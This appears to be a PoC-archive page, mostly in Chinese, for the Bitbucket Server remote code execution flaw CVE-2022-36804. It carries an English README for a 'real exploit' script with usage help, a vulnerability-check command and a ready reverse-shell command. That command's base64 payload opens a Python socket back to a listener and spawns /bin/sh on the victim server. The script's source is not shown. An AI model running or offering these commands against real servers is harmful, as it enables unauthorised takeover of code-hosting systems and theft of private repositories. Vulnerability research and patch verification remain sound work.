关联漏洞
标题:
Atlassian Bitbucket Server 安全漏洞
(CVE-2022-36804)
描述:Atlassian Bitbucket Server是澳大利亚Atlassian公司的一款Git代码托管解决方案。该方案能够管理并审查代码,具有差异视图、JIRA集成和构建集成等功能。 Atlassian Bitbucket Server and Data Center存在安全漏洞,该漏洞源于允许对公共或私有Bitbucket库有读取权限的远程攻击者通过发送恶意的HTTP请求执行任意代码。以下产品及版本受到影响:7.0.0 至 7.6.17 之前版本,7.7.0 至 7.17.10 之前版本,7.18.0
描述
A real exploit for BitBucket RCE CVE-2022-36804
介绍
# CVE-2022-36804 PoC
This repo contains a simple proof of concept exploit for the recent [BitBucket remote code execution vulnerability (CVE-2022-36804)](https://confluence.atlassian.com/bitbucketserver/bitbucket-server-and-data-center-advisory-2022-08-24-1155489835.html). Exploitation of this vulnerability requires access to a repository on the target instance, if you don't have creds, the target will need to have public respositories.
# Usage
```
usage: exploit.py [-h] -p PROJECT -r REPO -u URL [-c COMMAND] [--proxy PROXY] [--session SESSION]
[--check]
Exploits the CVE-2022-36804 RCE in vulnerable BitBucket instances (< v8.3.1)
optional arguments:
-h, --help show this help message and exit
-p PROJECT, --project PROJECT
The name of the project the public repository resides in (E.g.
testproject)
-r REPO, --repo REPO The name of the public repository (E.g. testrepo)
-u URL, --url URL The URL of the BitBucket server (E.g. http://localhost:7990/)
-c COMMAND, --command COMMAND
The command to execute on the server (E.g. 'curl http://canary.domain/')
--proxy PROXY HTTP proxy to use for debugging (E.g. http://localhost:8080/)
--session SESSION The value of your 'BITBUCKETSESSIONID' cookie, required if your target
repo is private. (E.g. 3DD8B1EBA3763AD2611F4940BD870865)
--check Only perform a check to see if the instance is vulnerable
```
# Examples
## Checking if an instance is vulnerable
To check if an instance is vulnerable you can perform the following command
```
python3 exploit.py -p PROJECT -r REPO -u http://target.site/ --check
```
## Establishing a reverse shell
The below command can be used to establish a reverse shell on the victim (the base64 payload will need to updated with your listeners details)
```
python3 exploit.py -p PROJECT -r REPO -u http://localhost:7990/ -c "echo 'cHl0aG9uMyAtYyAnaW1wb3J0IHNvY2tldCxvcyxwdHk7cz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KCgiMTkyLjE2OC42Ny4zIiw4ODg4KSk7b3MuZHVwMihzLmZpbGVubygpLDApO29zLmR1cDIocy5maWxlbm8oKSwxKTtvcy5kdXAyKHMuZmlsZW5vKCksMik7cHR5LnNwYXduKCIvYmluL3NoIikn' | base64 -d | bash |"
```
# Credits
- [TheGrandPew](https://github.com/TheGrandPew) - Identifying and reporting the bug
### Disclaimer
This exploit is for educational/research purposes, I am not responsible for how people will use it. Be nice :)
文件快照
[4.0K] /data/pocs/635c2f464fd94de2691117c93c81a8e6beeaea95
├── [4.6K] exploit.py
└── [2.5K] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。